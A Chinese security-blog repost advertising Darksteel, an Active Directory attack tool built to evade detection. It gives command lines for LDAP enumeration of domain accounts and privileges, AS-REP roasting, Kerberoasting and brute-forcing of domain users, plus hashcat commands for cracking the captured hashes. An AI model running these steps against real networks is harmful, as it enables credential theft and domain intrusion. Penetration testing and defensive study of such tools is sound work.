2.0.1!域内自动化信息收集利用工具

admin 2023年9月8日11:33:21评论39 views字数 2390阅读7分58秒阅读模式
声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。

 

现在只对常读和星标的公众号才展示大图推送,建议大家把Hack分享吧“设为星标”,否则可能看不到了!

 

工具介绍

Darksteel是一款域内自动化信息搜集并利用的工具。在渗透时发现单独搜集域内信息比较繁琐,漏洞利用也需要很多工具,所以完成此项目,帮助我解决域内信息搜集繁琐问题以及漏洞利用问题。

此项目以规避检测为主要目的完成,直接对域控进行攻击的利用没有做,因为如果有设备会产生大量的告警,后续可能会添加bypass检测的利用。

 

功能演示

可不填写账号密码使用本地账号进行认证查询(-d参数需要填写域名)

darksteel.exe ldap -d dc.domain.com -n domain.com -m computer ____    ______  ____    __  __   ____    ______  ____    ____    __/  _` /  _  /  _` / /  /  _` /__  _/  _` /  _` /   /   L   L   /'/' ,L_/_/ /  L_  L_         __   ,  /  , <  /___         _L   _L    _  _   /   \ \  \`  / L       L   L   L  ____/ _ _ _ _ _ _\ `____  _  ____/ ____/ ____//___/  /_//_//_// //_//_/ /_____/  /_/  /___/  /___/  /___/
v2.0.0
[*] Domain Computers:WIN-KQH5FQSIJSHDESKTOP-AO8D722DESKTOP-DO7D913WIN-7UI852PLEXCHANGESERVER
主要功能

ldap当我们拥有一个域内账号密码(hash),可以通过ldap进行搜集域内有用信息,如spn、委派、存活计算机等等信息,为域渗透进行准备
kerberos针对kerberos漏洞进行利用
blast爆破域用户
computerip批量查询域内计算机对应的ip
 ____    ______  ____    __  __   ____    ______  ____    ____    __/  _` /  _  /  _` / /  /  _` /__  _/  _` /  _` /   /   L   L   /'/' ,L_/_/ /  L_  L_          __   ,  /  , <  /___         _L   _L    _    _   /   \ \  \`  / L       L   L   L     ____/ _ _ _ _ _ _\ `____  _  ____/ ____/ ____/    /___/  /_//_//_// //_//_/ /_____/  /_/  /___/  /___/  /___/
   v2.0.0
自动化域内信息搜集、kerberos利用工具
Usage:  darksteel [command]
Available Commands:  blast       爆破域内用户  completion  Generate the autocompletion script for the specified shell  computerip  查询域内计算机的ip地址  help        Help about any command  kerberos    kerberos利用  ldap        ldap查询
Flags:  -d, --dc string       域控地址  -n, --domain string   域名  -h, --help            help for darksteel
Use "darksteel [command] --help" for more information about a command.

 

使用实例

LDAP

1、当我们拥有一个域内账号密码(hash),可以通过ldap进行搜集域内有用信息,如spn、委派、存活计算机等等信息,为域渗透进行准备。
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -a

 

2、当我们想要查找域内某些关键字对应的user或者computer时可以使用关键字查询,来找到哪些是管理员user和管理员computer

darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -z 管理员
3、如果想查询的内容工具内没有写到也可以使用ldap语法进行查询
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -f "(objectClass=Computer)" -t cn,dNSHostName

 

Kerberos

1、利用kerberos不需要域认证对用户密钥进行获取,可选择输出hashcat或john爆破格式(默认为hashcat)爆破出来的密码则为该用户的密码,如果不指定目标用户则需要一个域用户账号密码进行ldap查询并输出所有可利用密钥。
hashcat爆破命令:hashcat -m 18200 hash.txt pass.txt --force
darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -u user -p password(hash)
2、指定目标用户,则不需要域用户认证
darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -t zz
3、如果目标将用户设置了spn后,则可以将密钥输出,可选择输出hashcat或john爆破格式(默认为hashcat)爆破出来的密码则为该用户的密码,如果不指定目标用户则需要一个域用户账号密码进行ldap查询并输出所有可利用密钥。
hashcat爆破命令:hashcat -m 13100 hash.txt pass.txt --force
darksteel.exe kerberos -m kerberoast -d 192.168.1.1 -n test.com -u user -p password(hash)
......

 

下载地址

https://github.com/wjlab/Darksteel

原文始发于微信公众号(Hack分享吧):2.0.1!域内自动化信息收集利用工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月8日11:33:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2.0.1!域内自动化信息收集利用工具http://cn-sec.com/archives/2018074.html

发表评论

匿名网友 填写信息